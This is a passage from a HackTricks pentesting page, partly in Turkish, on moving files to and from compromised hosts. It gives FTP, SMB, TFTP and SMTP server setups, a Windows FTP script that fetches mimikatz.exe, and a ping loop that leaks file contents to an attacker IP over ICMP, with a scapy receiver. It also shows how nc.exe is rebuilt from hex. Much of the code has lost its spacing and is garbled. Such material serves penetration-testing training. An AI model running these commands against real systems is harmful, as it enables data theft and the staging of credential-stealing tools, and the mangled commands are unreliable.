Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Windows istemci
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Sunucu olarak Kali
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Veya bir smb paylaşımı oluşturun samba kullanarak:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Windows
Exfiltration
Exfiltration is the unauthorized transfer of data from a target system. There are various methods to exfiltrate data from a compromised system, including:
Email: Sending data as email attachments to an external email address.
FTP: Transferring data using the File Transfer Protocol to a remote server.
DNS: Encoding data within DNS requests to leak information.
HTTP/HTTPS: Sending data over HTTP or HTTPS to a remote server.
Steganography: Hiding data within images or other files to avoid detection.
Cloud Storage: Uploading data to cloud storage services like Dropbox or Google Drive.
Exfiltration can be a critical phase in a cyber attack, as it allows threat actors to steal sensitive information from a target organization. It is essential for organizations to implement strong security measures to prevent data exfiltration and protect their valuable assets.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
NC, or Netcat, is a versatile networking tool that can be used for exfiltration. It can create connections to remote systems, listen for incoming connections, and transfer data between systems. NC can be used to exfiltrate data over various protocols such as TCP or UDP. It is a powerful tool for both red teaming and penetration testing engagements.
ICMP, Internet Control Message Protocol, is a network layer protocol used to send error messages and operational information indicating success or failure when communicating with a host. ICMP can also be used for exfiltration purposes due to its low detection rate and ability to bypass firewalls.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Eğer bir SMTP sunucusuna veri gönderebiliyorsanız, veriyi almak için bir SMTP oluşturabilirsiniz:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
XP ve 2003'te varsayılan olarak (diğerlerinde kurulum sırasında açıkça eklenmesi gerekir)
Kali'de TFTP sunucusunu başlatın:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript can be used to exfiltrate data from a compromised system. This can be achieved by encoding the data and sending it to an external server controlled by the attacker. VBScript can also be used to compress the data before exfiltration to minimize the amount of data sent over the network. This technique can help attackers avoid detection by security tools that monitor network traffic for suspicious patterns.
debug.exe programı sadece ikili dosyaların incelenmesine izin vermekle kalmaz, aynı zamanda onları onaltılıktan yeniden oluşturma yeteneğine sahiptir. Bu, bir ikili dosyanın onaltılık bir gösterimini sağlayarak debug.exenin ikili dosyayı oluşturabilmesi anlamına gelir. Bununla birlikte, debug.exe'nin 64 kb boyutundaki dosyaları birleştirme sınırlaması olduğunu unutmamak önemlidir.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Ardından metni windows-shell'e kopyalayıp yapıştırın ve nc.exe adında bir dosya oluşturulacaktır.* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
## DNS* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)**Try Hard Security Group**<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
<div data-gb-custom-block data-tag="embed" data-url='https://discord.gg/tryhardsecurity'></div><details><summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmaya kadar AWS hackleme öğrenin!</summary>
HackTricks'ı desteklemenin diğer yolları:* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>